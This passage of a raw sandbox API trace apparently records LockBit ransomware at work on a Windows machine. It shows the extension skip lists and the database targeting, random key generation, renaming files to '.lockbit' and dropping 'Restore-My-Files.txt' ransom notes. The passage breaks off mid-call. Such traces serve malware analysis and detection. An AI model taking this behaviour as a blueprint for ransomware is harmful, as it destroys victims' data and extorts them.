lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.984] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.984] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.984] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.984] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.984] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.985] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.985] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.985] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.985] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.985] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.985] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15170_.GIF") returned 1 [0203.985] lstrcmpiW (lpString1="ntldr", lpString2="BD15170_.GIF") returned 1 [0203.985] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15170_.GIF") returned 1 [0203.985] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15170_.GIF") returned 1 [0203.985] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15170_.GIF") returned -1 [0203.985] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15170_.GIF") returned 1 [0203.985] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15170_.GIF") returned 1 [0203.985] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.985] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15170_.GIF") returned=".GIF" [0203.985] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.986] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.986] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.986] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15170_.GIF.lockbit") returned 78 [0203.986] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15170_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15170_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.987] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.988] malloc (_Size=0x40068) returned 0x3df0008 [0203.988] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=257) returned 1 [0203.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.988] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.992] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15170_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15170_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.992] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.992] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.992] free (_Block=0x1fa2ed8) [0203.992] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15170_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.992] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.992] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.992] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a06a900, ftCreationTime.dwHighDateTime=0x1bd4f40, ftLastAccessTime.dwLowDateTime=0xbcaf5220, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7a06a900, ftLastWriteTime.dwHighDateTime=0x1bd4f40, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15171_.GIF", cAlternateFileName="")) returned 1 [0203.992] lstrcmpiW (lpString1=".", lpString2="BD15171_.GIF") returned -1 [0203.992] lstrcmpiW (lpString1="..", lpString2="BD15171_.GIF") returned -1 [0203.992] PathFindExtensionW (pszPath="BD15171_.GIF") returned=".GIF" [0203.992] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.992] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.992] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.992] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.992] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.992] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.992] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.992] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.992] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.992] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.992] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.992] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.993] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.993] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.993] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.993] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.993] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.993] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.993] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15171_.GIF") returned 1 [0203.994] lstrcmpiW (lpString1="ntldr", lpString2="BD15171_.GIF") returned 1 [0203.994] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15171_.GIF") returned 1 [0203.994] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15171_.GIF") returned 1 [0203.994] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15171_.GIF") returned -1 [0203.994] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15171_.GIF") returned 1 [0203.994] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15171_.GIF") returned 1 [0203.994] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.994] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15171_.GIF") returned=".GIF" [0203.994] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.994] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.994] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.995] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.995] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.995] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.995] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15171_.GIF.lockbit") returned 78 [0203.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15171_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15171_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.996] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.996] malloc (_Size=0x40068) returned 0x3df0008 [0203.996] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=145) returned 1 [0203.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.996] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.997] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15171_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15171_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.000] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.000] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.000] free (_Block=0x1fa2ed8) [0204.000] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15171_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.000] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.000] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf2be700, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcb1b380, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcf2be700, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x130, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15172_.GIF", cAlternateFileName="")) returned 1 [0204.001] lstrcmpiW (lpString1=".", lpString2="BD15172_.GIF") returned -1 [0204.001] lstrcmpiW (lpString1="..", lpString2="BD15172_.GIF") returned -1 [0204.001] PathFindExtensionW (pszPath="BD15172_.GIF") returned=".GIF" [0204.001] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.001] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.001] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15172_.GIF") returned 1 [0204.002] lstrcmpiW (lpString1="ntldr", lpString2="BD15172_.GIF") returned 1 [0204.002] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15172_.GIF") returned 1 [0204.002] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15172_.GIF") returned 1 [0204.002] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15172_.GIF") returned -1 [0204.002] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15172_.GIF") returned 1 [0204.002] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15172_.GIF") returned 1 [0204.002] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.002] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15172_.GIF") returned=".GIF" [0204.002] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.002] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.002] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.003] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.003] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.003] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.003] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft 